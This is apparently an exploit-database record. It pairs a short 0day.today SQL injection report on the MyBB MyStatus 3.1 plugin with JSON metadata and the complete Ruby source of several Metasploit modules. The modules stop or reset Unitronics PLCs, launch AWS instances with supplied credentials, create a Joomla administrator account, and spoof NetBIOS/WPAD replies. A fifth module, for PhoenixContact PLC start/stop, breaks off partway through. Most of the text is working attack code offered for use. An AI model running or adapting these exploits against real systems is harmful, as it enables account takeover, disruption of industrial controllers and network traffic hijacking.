ID 1337DAY-ID-16996
Type zdt
Reporter Mario_Vs
Modified 2011-10-11T00:00:00
Description
Exploit for php platform in category web applications
---------------------------------------------------------------------
Exploit Title : MyBB MyStatus 3.1
---------------------------------------------------------------------
Author : Mario_Vs
Date : 10/10/2011
Site : http://mariovs.pl/
@ : mario_vs[at]o2.pl
---------------------------------------------------------------------
Description >
Vendor : http://mods.mybb.com/download/mystatus
Tested On : Windows 7
---------------------------------------------------------------------
SQL Injection
http://localhost/mybb/process-mystatus.php?action=delete&statid=[SQLi]
---------------------------------------------------------------------
---------------------------------------------------------------------
Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2
All users: HackinQ.pl
# 0day.today [2018-01-08] #
{"hash": "dad75044b3cc791f7a8032ce4609092409f7a12ee4cfbc34b531622d0c443756", "id": "1337DAY-ID-16996", "lastseen": "2018-01-08T23:02:20", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "79fda2751df384ee33bc0f81cfdb121d", "key": "href"}, {"hash": "1dc677035809cbeaa0102b0f66772969", "key": "modified"}, {"hash": "1dc677035809cbeaa0102b0f66772969", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "794f037ba8f99725492b9271501217b6", "key": "reporter"}, {"hash": "0d42b24d026ff7bf93bd0fbb70c81bc1", "key": "sourceData"}, {"hash": "aeb41974b1969395000674f99524b0b5", "key": "sourceHref"}, {"hash": "95ab27474d65e9a3e99463b0cffd8a42", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2018-01-08T23:02:20"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-16996"]}, {"type": "zdt", "idList": ["1337DAY-ID-29285", "1337DAY-ID-16168", "1337DAY-ID-6445"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16996", "SECURITYVULNS:VULN:7705", "SECURITYVULNS:DOC:9830"]}], "modified": "2018-01-08T23:02:20"}, "vulnersScore": 6.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16996", "description": "Exploit for php platform in category web applications", "title": "MyBB MyStatus 3.1 SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "5e7aeba75eed1c2d339ba8b989a4ac5cf20ecc7f2bfa3a018b43fe8434a3d456", "id": "1337DAY-ID-16996", "lastseen": "2016-04-20T01:30:49", "enchantments": {"score": {"value": 6.1, "modified": "2016-04-20T01:30:49"}}, "hashmap": [{"hash": "1dc677035809cbeaa0102b0f66772969", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "95ab27474d65e9a3e99463b0cffd8a42", "key": "title"}, {"hash": "794f037ba8f99725492b9271501217b6", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1dc677035809cbeaa0102b0f66772969", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5a08c389d19b9013e34484540cb6cc63", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ac78b44d5059ad1a67bac1544e68bfe0", "key": "sourceData"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b56332c265dd77752c561539861c7bfd", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16996", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "MyBB MyStatus 3.1 SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "\ufeff---------------------------------------------------------------------\r\nExploit Title : MyBB MyStatus 3.1\r\n---------------------------------------------------------------------\r\n \r\nAuthor : Mario_Vs\r\nDate : 10/10/2011\r\nSite : http://mariovs.pl/\r\n@ : mario_vs[at]o2.pl\r\n---------------------------------------------------------------------\r\n \r\nDescription >\r\n \r\nVendor : http://mods.mybb.com/download/mystatus\r\nTested On : Windows 7\r\n---------------------------------------------------------------------\r\n \r\nSQL Injection\r\n \r\nhttp://localhost/mybb/process-mystatus.php?action=delete&statid=[SQLi]\r\n---------------------------------------------------------------------\r\n \r\n---------------------------------------------------------------------\r\n \r\nGreets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2\r\n \r\nAll users: HackinQ.pl\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2011-10-11T00:00:00", "references": [], "reporter": "Mario_Vs", "modified": "2011-10-11T00:00:00", "href": "http://0day.today/exploit/description/16996"}, "lastseen": "2016-04-20T01:30:49", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "\ufeff---------------------------------------------------------------------\r\nExploit Title : MyBB MyStatus 3.1\r\n---------------------------------------------------------------------\r\n \r\nAuthor : Mario_Vs\r\nDate : 10/10/2011\r\nSite : http://mariovs.pl/\r\n@ : mario_vs[at]o2.pl\r\n---------------------------------------------------------------------\r\n \r\nDescription >\r\n \r\nVendor : http://mods.mybb.com/download/mystatus\r\nTested On : Windows 7\r\n---------------------------------------------------------------------\r\n \r\nSQL Injection\r\n \r\nhttp://localhost/mybb/process-mystatus.php?action=delete&statid=[SQLi]\r\n---------------------------------------------------------------------\r\n \r\n---------------------------------------------------------------------\r\n \r\nGreets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2\r\n \r\nAll users: HackinQ.pl\r\n\r\n\n\n# 0day.today [2018-01-08] #", "published": "2011-10-11T00:00:00", "references": [], "reporter": "Mario_Vs", "modified": "2011-10-11T00:00:00", "href": "https://0day.today/exploit/description/16996"}
{"metasploit": [{"lastseen": "2019-11-30T12:07:52", "bulletinFamily": "exploit", "description": "Unitronics Vision PLCs allow remote administrative functions to control the PLC using authenticated PCOM commands. This module supports START, STOP and RESET operations.\n", "modified": "2019-02-11T19:46:00", "published": "2019-02-11T19:46:00", "id": "MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND", "href": "", "type": "metasploit", "title": "Unitronics PCOM remote START/STOP/RESET command", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Rex::Socket::Tcp\n include Rex::Text\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Unitronics PCOM remote START/STOP/RESET command',\n 'Description' => %q{\n Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.\n },\n 'Author' =>\n [\n 'Luis Rosa <lmrosa[at]dei.uc.pt>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf' ]\n ],\n ))\n\n register_options(\n [\n OptEnum.new('MODE', [true, 'PLC command', 'RESET', ['START', 'STOP', 'RESET']]),\n Opt::RPORT(20256),\n OptInt.new('UNITID', [ false, 'Unit ID (0 - 127)', 0]),\n ])\n end\n\n # compute and return the checksum of a PCOM ASCII message\n def pcom_ascii_checksum(msg)\n (msg.each_byte.inject(:+) % 256 ).to_s(16).upcase.rjust(2, '0')\n end\n\n # compute pcom length\n def pcom_ascii_len(pcom_ascii)\n Rex::Text.hex_to_raw(pcom_ascii.length.to_s(16).rjust(4,'0').unpack('H4H4').reverse.pack('H4H4'))\n end\n\n # return a pcom ascii formatted request\n def pcom_ascii_request(command)\n unit_id = datastore['UNITID'].to_s(16).rjust(2,'0')\n # PCOM/ASCII\n pcom_ascii_payload = \"\" +\n \"\\x2f\" + # '/'\n unit_id +\n command +\n pcom_ascii_checksum(unit_id + command) + # checksum\n \"\\x0d\" # '\\r'\n\n # PCOM/TCP header\n Rex::Text.rand_text_hex(2) + # transaction id\n \"\\x65\" + # ascii (101)\n \"\\x00\" + # reserved\n pcom_ascii_len(pcom_ascii_payload) + # length\n pcom_ascii_payload\n end\n\n def run\n connect\n case datastore['MODE']\n when 'START'\n print_status 'Sending START command'\n ascii_code = \"\\x43\\x43\\x52\" # CCR\n when 'STOP'\n print_status 'Sending STOP command'\n ascii_code = \"\\x43\\x43\\x53\" # CCS\n when 'RESET'\n print_status 'Sending RESET command'\n ascii_code = \"\\x43\\x43\\x45\" # CCE\n else\n print_error \"Unknown MODE\"\n return\n end\n\n sock.put(pcom_ascii_request(ascii_code)) #\n ans = sock.get_once\n if ans.to_s[10,2] == 'CC'\n print_status 'Command accepted'\n end\n disconnect\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/pcom_command.rb"}, {"lastseen": "2019-11-28T18:58:35", "bulletinFamily": "exploit", "description": "This module will attempt to launch an AWS instances (hosts) in EC2.\n", "modified": "2017-07-24T13:26:21", "published": "2017-03-13T05:57:58", "id": "MSF:AUXILIARY/ADMIN/AWS/AWS_LAUNCH_INSTANCES", "href": "", "type": "metasploit", "title": "Launches Hosts in AWS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/aws/client'\n\nclass MetasploitModule < Msf::Auxiliary\n include Metasploit::Framework::Aws::Client\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"Launches Hosts in AWS\",\n 'Description' => %q{\n This module will attempt to launch an AWS instances (hosts) in EC2.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Javier Godinez <godinezj[at]gmail.com>',\n ],\n 'References' => [\n [ 'URL', 'https://drive.google.com/open?id=0B2Ka7F_6TetSNFdfbkI1cnJHUTQ'],\n [ 'URL', 'https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/4721/IDY-W10-DevSecOps-on-the-Offense-Automating-Amazon-Web-Services-Account-Takeover.pdf' ]\n ]\n )\n )\n register_options(\n [\n OptString.new('AccessKeyId', [true, 'AWS access key', '']),\n OptString.new('SecretAccessKey', [true, 'AWS secret key', '']),\n OptString.new('Token', [false, 'AWS session token', '']),\n OptString.new('RHOST', [true, 'AWS region specific EC2 endpoint', 'ec2.us-west-2.amazonaws.com']),\n OptString.new('Region', [true, 'The default region', 'us-west-2' ]),\n OptString.new(\"AMI_ID\", [true, 'The Amazon Machine Image (AMI) ID', 'ami-1e299d7e']),\n OptString.new(\"KEY_NAME\", [true, 'The SSH key to be used for ec2-user', 'admin']),\n OptString.new(\"SSH_PUB_KEY\", [false, 'The public SSH key to be used for ec2-user, e.g., \"ssh-rsa ABCDE...\"', '']),\n OptString.new(\"USERDATA_FILE\", [false, 'The script that will be executed on start', 'tools/modules/aws-aggregator-userdata.sh'])\n ]\n )\n register_advanced_options(\n [\n OptString.new('RPORT', [true, 'AWS EC2 Endpoint TCP Port', 443]),\n OptBool.new('SSL', [true, 'AWS EC2 Endpoint SSL', true]),\n OptString.new('INSTANCE_TYPE', [true, 'The instance type', 'm3.medium']),\n OptString.new('ROLE_NAME', [false, 'The instance profile/role name', '']),\n OptString.new('VPC_ID', [false, 'The EC2 VPC ID', '']),\n OptString.new('SUBNET_ID', [false, 'The public subnet to use', '']),\n OptString.new('SEC_GROUP_ID', [false, 'The EC2 security group to use', '']),\n OptString.new('SEC_GROUP_CIDR', [true, 'EC2 security group network access CIDR', '0.0.0.0/0']),\n OptString.new('SEC_GROUP_PORT', [true, 'EC2 security group network access PORT', 'tcp:22']),\n OptString.new('SEC_GROUP_NAME', [false, 'Optional EC2 security group name', '']),\n OptInt.new('MaxCount', [true, 'Maximum number of instances to launch', 1]),\n OptInt.new('MinCount', [true, 'Minumum number of instances to launch', 1])\n ]\n )\n deregister_options('VHOST')\n end\n\n def run\n if datastore['AccessKeyId'].blank? || datastore['SecretAccessKey'].blank?\n print_error(\"Both AccessKeyId and SecretAccessKey are required\")\n return\n end\n # setup creds for making IAM API calls\n creds = {\n 'AccessKeyId' => datastore['AccessKeyId'],\n 'SecretAccessKey' => datastore['SecretAccessKey']\n }\n creds['Token'] = datastore['Token'] unless datastore['Token'].blank?\n\n create_keypair(creds) unless datastore['SSH_PUB_KEY'].blank?\n vpc = datastore['VPC_ID'].blank? ? vpc(creds) : datastore['VPC_ID']\n sg = datastore['SEC_GROUP_ID'].blank? ? create_sg(creds, vpc) : datastore['SEC_GROUP_ID']\n subnet = datastore['SUBNET_ID'].blank? ? pub_subnet(creds, vpc) : datastore['SUBNET_ID']\n unless subnet\n print_error(\"Could not find a public subnet, please provide one\")\n return\n end\n instance_id = launch_instance(creds, subnet, sg)\n action = 'DescribeInstances'\n doc = call_ec2(creds, 'Action' => action, 'InstanceId.1' => instance_id)\n doc = print_results(doc, action)\n begin\n # need a better parser so we can avoid shit like this\n ip = doc['reservationSet']['item']['instancesSet']['item']['networkInterfaceSet']['item']['privateIpAddressesSet']['item']['association']['publicIp']\n print_status(\"Instance #{instance_id} has IP adrress #{ip}\")\n rescue NoMethodError\n print_error(\"Could not retrieve instance IP address\")\n end\n end\n\n def opts(action, subnet, sg)\n opts = {\n 'Action' => action,\n 'ImageId' => datastore['AMI_ID'],\n 'KeyName' => datastore['KEY_NAME'],\n 'InstanceType' => datastore['INSTANCE_TYPE'],\n 'NetworkInterface.1.SubnetId' => subnet,\n 'NetworkInterface.1.SecurityGroupId.1' => sg,\n 'MinCount' => datastore['MinCount'].to_s,\n 'MaxCount' => datastore['MaxCount'].to_s,\n 'NetworkInterface.1.AssociatePublicIpAddress' => 'true',\n 'NetworkInterface.1.DeviceIndex' => '0'\n }\n opts['IamInstanceProfile.Name'] = datastore['ROLE_NAME'] unless datastore['ROLE_NAME'].blank?\n unless datastore['USERDATA_FILE'].blank?\n if File.exist?(datastore['USERDATA_FILE'])\n opts['UserData'] = URI.encode(Base64.encode64(open(datastore['USERDATA_FILE'], 'r').read).strip)\n else\n print_error(\"Could not open userdata file: #{datastore['USERDATA_FILE']}\")\n end\n end\n opts\n end\n\n def launch_instance(creds, subnet, sg)\n action = 'RunInstances'\n print_status(\"Launching instance(s) in #{datastore['Region']}, AMI: #{datastore['AMI_ID']}, key pair name: #{datastore['KEY_NAME']}, security group: #{sg}, subnet ID: #{subnet}\")\n doc = call_ec2(creds, opts(action, subnet, sg))\n doc = print_results(doc, action)\n return if doc.nil?\n # TODO: account for multiple instances\n if doc['instancesSet']['item'].instance_of?(Array)\n instance_id = doc['instancesSet']['item'].first['instanceId']\n else\n instance_id = doc['instancesSet']['item']['instanceId']\n end\n print_status(\"Launched instance #{instance_id} in #{datastore['Region']} account #{doc['ownerId']}\")\n action = 'DescribeInstanceStatus'\n loop do\n sleep(15)\n doc = call_ec2(creds, 'Action' => action, 'InstanceId' => instance_id)\n doc = print_results(doc, action)\n if doc ['instanceStatusSet'].nil?\n print_error(\"Error, could not get instance status, instance possibly terminated\")\n break\n end\n status = doc['instanceStatusSet']['item']['systemStatus']['status']\n print_status(\"instance #{instance_id} status: #{status}\")\n break if status == 'ok' || status != 'initializing'\n end\n instance_id\n end\n\n def create_keypair(creds)\n action = 'ImportKeyPair'\n doc = call_ec2(creds, 'Action' => action, 'KeyName' => datastore['KEY_NAME'], 'PublicKeyMaterial' => Rex::Text.encode_base64(datastore['SSH_PUB_KEY']))\n if doc['Response'].nil?\n doc = print_results(doc, action)\n if doc['keyName'].nil? || doc['keyFingerprint'].nil?\n print_error(\"Error creating key using privided key material (SSH_PUB_KEY)\")\n else\n print_status(\"Created #{doc['keyName']} (#{doc['keyFingerprint']})\")\n end\n else\n if doc['Response']['Errors'] && doc['Response']['Errors']['Error']\n print_error(doc['Response']['Errors']['Error']['Message'])\n else\n print_error(\"Error creating key using privided key material (SSH_PUB_KEY)\")\n end\n end\n end\n\n def pub_subnet(creds, vpc_id)\n # First look for subnets that are configured to provision a public IP when instances are launched\n action = 'DescribeSubnets'\n doc = call_ec2(creds, 'Action' => action)\n doc = print_results(doc, action)\n vpc_subnets = doc['subnetSet']['item'].select { |x| x['vpcId'] == vpc_id }\n pub_subnets = vpc_subnets.select { |x| x['mapPublicIpOnLaunch'] == 'true' }\n return pub_subnets.first['subnetId'] if pub_subnets.count > 0\n\n # Second, try to retrieve public subnet id by looking through route tables to find subnets\n # associated with an Internet gateway\n action = 'DescribeRouteTables'\n doc = call_ec2(creds, 'Action' => action)\n doc = print_results(doc, action)\n vpc_route_table = doc['routeTableSet']['item'].select { |x| x['vpcId'] == vpc_id }\n vpc_route_table.each do |route_table|\n next if route_table['associationSet'].nil? || route_table['routeSet'].nil?\n entries = route_table['routeSet']['item']\n if entries.instance_of?(Hash)\n if entries['gatewayId'].start_with?('igw-')\n return route_table['associationSet']['item'].first['subnetId']\n end\n else\n route_table['routeSet']['item'].each do |route|\n if route['gatewayId'] && route['gatewayId'].start_with?('igw-')\n return route_table['associationSet']['item'].first['subnetId']\n end\n end\n end\n end\n nil\n end\n\n def create_sg(creds, vpc_id)\n name = Rex::Text.rand_text_alphanumeric(8)\n action = 'CreateSecurityGroup'\n doc = call_ec2(creds, 'Action' => action, 'GroupName' => name, 'VpcId' => vpc_id, 'GroupDescription' => name)\n doc = print_results(doc, action)\n print_error(\"Could not create SG\") && return if doc['groupId'].nil?\n sg = doc['groupId']\n proto, port = datastore['SEC_GROUP_PORT'].split(':')\n cidr = URI.encode(datastore['SEC_GROUP_CIDR'])\n action = 'AuthorizeSecurityGroupIngress'\n doc = call_ec2(creds, 'Action' => action,\n 'IpPermissions.1.IpRanges.1.CidrIp' => cidr,\n 'IpPermissions.1.IpProtocol' => proto,\n 'IpPermissions.1.FromPort' => port,\n 'IpPermissions.1.ToPort' => port,\n 'GroupId' => sg)\n doc = print_results(doc, action)\n if doc['return'] && doc['return'] == 'true'\n print_status(\"Created security group: #{sg}\")\n else\n print_error(\"Failed creating security group\")\n end\n sg\n end\n\n def vpc(creds)\n action = 'DescribeVpcs'\n doc = call_ec2(creds, 'Action' => action)\n doc = print_results(doc, action)\n if doc['vpcSet'].nil? || doc['vpcSet']['item'].nil?\n print_error(\"Could not determine VPC ID for #{datastore['AccessKeyId']} in #{datastore['RHOST']}\")\n return nil\n end\n item = doc['vpcSet']['item']\n return item['vpcId'] if item.instance_of?(Hash)\n return item.first['vpcId'] if item.instance_of?(Array) && !item.first['vpcId'].nil?\n print_error(\"Could not determine VPC ID for #{datastore['AccessKeyId']} in #{datastore['RHOST']}\")\n nil\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/aws/aws_launch_instances.rb"}, {"lastseen": "2019-11-10T15:24:55", "bulletinFamily": "exploit", "description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4 through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).\n", "modified": "2019-07-13T01:29:43", "published": "2016-10-27T01:46:40", "id": "MSF:AUXILIARY/ADMIN/HTTP/JOOMLA_REGISTRATION_PRIVESC", "href": "", "type": "metasploit", "title": "Joomla Account Creation and Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Joomla\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Joomla Account Creation and Privilege Escalation',\n 'Description' => %q{\n This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).\n },\n 'References' =>\n [\n ['CVE', '2016-8869'],\n ['CVE', '2016-8870'],\n ['URL', 'https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html'],\n ['URL', 'https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html'],\n ['URL', 'https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2']\n ],\n 'Author' =>\n [\n 'Fabio Pires <fp[at]integrity.pt>', # module creation and privilege escalation\n 'Filipe Reis <fr[at]integrity.pt>', # module creation and privilege escalation\n 'Vitor Oliveira <vo[at]integrity.pt>', # module creation and privilege escalation\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Oct 25 2016'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/']),\n OptString.new('USERNAME', [true, 'Username that will be created', 'expl0it3r']),\n OptString.new('PASSWORD', [true, 'Password for the username', 'expl0it3r']),\n OptString.new('EMAIL', [true, 'Email to receive the activation code for the account', 'example@youremail.com'])\n ]\n )\n end\n\n def check\n res = send_request_cgi('uri' => target_uri.path)\n\n unless res\n vprint_error('Unable to connect to target')\n return Exploit::CheckCode::Unknown\n end\n\n unless joomla_and_online?\n vprint_error('Unable to detect Joomla')\n return Exploit::CheckCode::Safe\n end\n\n version = Gem::Version.new(joomla_version)\n\n unless version\n vprint_error('Unable to detect Joomla version')\n return Exploit::CheckCode::Detected\n end\n\n vprint_status(\"Detected Joomla version #{version}\")\n\n if version.between?(Gem::Version.new('3.4.4'), Gem::Version.new('3.6.3'))\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n def get_csrf(hidden_fields)\n hidden_list = hidden_fields\n hidden_list.each do |fields|\n fields.each do |item|\n if item[0].length == 32 && item[1] == '1'\n return item[0]\n end\n end\n end\n end\n\n def run\n if check == Exploit::CheckCode::Safe\n print_error('Target seems safe, so we will not continue!')\n return\n end\n\n print_status(\"Trying to create the user!\")\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php/component/users/'),\n 'vars_get' => {\n 'view' => 'login'\n }\n )\n\n if res && res.code == 200\n cookie = res.get_cookies\n csrf = get_csrf(res.get_hidden_inputs)\n\n if csrf.length != 32 && cookie.split(/=/).length != 2\n print_error('Could not find csrf or cookie!')\n return\n end\n else\n print_error('Could not find Login Page!')\n return\n end\n\n mime = Rex::MIME::Message.new\n mime.add_part(datastore['USERNAME'], nil, nil, 'form-data; name=\"user[name]\"')\n mime.add_part(datastore['USERNAME'], nil, nil, 'form-data; name=\"user[username]\"')\n mime.add_part('7', nil, nil, 'form-data; name=\"user[groups][]\"')\n mime.add_part(datastore['PASSWORD'], nil, nil, 'form-data; name=\"user[password1]\"')\n mime.add_part(datastore['PASSWORD'] , nil, nil, 'form-data; name=\"user[password2]\"')\n mime.add_part(datastore['EMAIL'], nil, nil, 'form-data; name=\"user[email1]\"')\n mime.add_part(datastore['EMAIL'], nil, nil, 'form-data; name=\"user[email2]\"')\n mime.add_part('com_users', nil, nil, 'form-data; name=\"option\"')\n mime.add_part('user.register', nil, nil, 'form-data; name=\"task\"')\n mime.add_part('1', nil, nil, 'form-data; name=\"' + csrf +'\"')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php/component/users/'),\n 'cookie' => cookie,\n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\",\n 'data' => mime.to_s\n )\n\n if res && res.code == 200\n print_good(\"PWND - Your user has been created\")\n print_status(\"\\tUsername: \" + datastore['USERNAME'])\n print_status(\"\\tPassword: \" + datastore['PASSWORD'])\n print_status(\"\\tEmail: \" + datastore['EMAIL'])\n elsif res.redirect?\n res = send_request_cgi!(\n 'uri' => res.redirection.path,\n 'method' => 'GET',\n 'cookie' => cookie\n )\n\n print_error(\"There was an issue, but the user could have been created.\")\n\n parsed_data = res.get_html_document\n parsed_data.xpath('//div[@class=\"alert-message\"]').each do |alert_msg|\n print_error(\"\\t\" + alert_msg.text)\n end\n else\n print_error(\"This host may not be vulnerable.\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/joomla_registration_privesc.rb"}, {"lastseen": "2019-12-08T11:54:25", "bulletinFamily": "exploit", "description": "This module continuously spams NetBIOS responses to a target for given hostname, causing the target to cache a malicious address for this name. On high-speed local networks, the PPSRATE value should be increased to speed up this attack. As an example, a value of around 30,000 is almost 100% successful when spoofing a response for a 'WPAD' lookup. Distant targets may require more time and lower rates for a successful attack.\n", "modified": "2017-07-24T13:26:21", "published": "2016-06-19T18:36:39", "id": "MSF:AUXILIARY/ADMIN/NETBIOS/NETBIOS_SPOOF", "href": "", "type": "metasploit", "title": "NetBIOS Response Brute Force Spoof (Direct)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Udp\n\n def initialize\n super(\n 'Name' => 'NetBIOS Response Brute Force Spoof (Direct)',\n 'Description' => %q{\n This module continuously spams NetBIOS responses to a target for given hostname,\n causing the target to cache a malicious address for this name. On high-speed local\n networks, the PPSRATE value should be increased to speed up this attack. As an\n example, a value of around 30,000 is almost 100% successful when spoofing a\n response for a 'WPAD' lookup. Distant targets may require more time and lower\n rates for a successful attack.\n },\n 'Author' => [\n 'vvalien', # Metasploit Module (post)\n 'hdm', # Metasploit Module\n 'tombkeeper' # Related Work\n ],\n 'License' => MSF_LICENSE,\n )\n\n register_options(\n [\n Opt::RPORT(137),\n OptString.new('NBNAME', [ true, \"The NetBIOS name to spoof a reply for\", 'WPAD' ]),\n OptAddress.new('NBADDR', [ true, \"The address that the NetBIOS name should resolve to\", Rex::Socket.source_address(\"50.50.50.50\") ]),\n OptInt.new('PPSRATE', [ true, \"The rate at which to send NetBIOS replies\", 1_000])\n ],\n self.class\n )\n end\n\n def netbios_spam\n payload =\n \"\\xff\\xff\" + # TX ID (will brute force this)\n \"\\x85\\x00\" + # Flags = response + authoratative + recursion desired\n \"\\x00\\x00\" + # Questions = 0\n \"\\x00\\x01\" + # Answer RRs = 1\n \"\\x00\\x00\" + # Authority RRs = 0\n \"\\x00\\x00\" + # Additional RRs = 0\n \"\\x20\" +\n Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack(\"A15\") + \"\\x00\" ) +\n \"\\x00\" +\n \"\\x00\\x20\" + # Type = NB\n \"\\x00\\x01\" + # Class = IN\n \"\\x00\\x04\\x93\\xe0\" + # TTL long time\n \"\\x00\\x06\" + # Datalength = 6\n \"\\x00\\x00\" + # Flags B-node, unique\n Rex::Socket.addr_aton(@fake_addr)\n\n stime = Time.now.to_f\n pcnt = 0\n pps = 0\n\n print_status(\"Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...\")\n\n live = true\n while live\n 0.upto(65535) do |txid|\n begin\n payload[0,2] = [txid].pack(\"n\")\n @sock.put(payload)\n pcnt += 1\n\n pps = (pcnt / (Time.now.to_f - stime)).to_i\n if pps > @targ_rate\n sleep(0.01)\n end\n rescue Errno::ECONNREFUSED\n print_error(\"Error: Target sent us an ICMP port unreachable, port is likely closed\")\n live = false\n break\n end\n end\n end\n\n print_status(\"Cleaning up...\")\n end\n\n def run\n connect_udp\n @sock = self.udp_sock\n\n @targ_addr = rhost\n @targ_port = rport\n @targ_rate = datastore['PPSRATE']\n @fake_name = datastore['NBNAME']\n @fake_addr = datastore['NBADDR']\n\n netbios_spam\n\n disconnect_udp\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/netbios/netbios_spoof.rb"}, {"lastseen": "2019-11-14T10:42:09", "bulletinFamily": "exploit", "description": "PhoenixContact Programmable Logic Controllers are built upon a variant of ProConOS. Communicating using a proprietary protocol over ports TCP/1962 and TCP/41100 or TCP/20547. It allows a remote user to read out the PLC Type, Firmware and Build number on port TCP/1962. And also to read out the CPU State (Running or Stopped) AND start or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series) or on port TCP/20547 (confirmed ILC 39x series)\n", "modified": "2017-07-24T13:26:21", "published": "2016-05-17T13:45:45", "id": "MSF:AUXILIARY/ADMIN/SCADA/PHOENIX_COMMAND", "href": "", "type": "metasploit", "title": "PhoenixContact PLC Remote START/STOP Command", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Rex::Socket::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PhoenixContact PLC Remote START/STOP Command',\n 'Version' => '1',\n 'Description' => %q{\n PhoenixContact Programmable Logic Controllers are built upon a variant of\n ProConOS. Communicating using a proprietary protocol over ports TCP/1962\n and TCP/41100 or TCP/20547.\n It allows a remote user to read out the PLC Type, Firmware and\n Build number on port TCP/1962.\n And also to read out the CPU State (Running or Stopped) AND start\n or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)\n or on port TCP/20547 (confirmed ILC 39x series)\n },\n 'Author' => 'Tijl 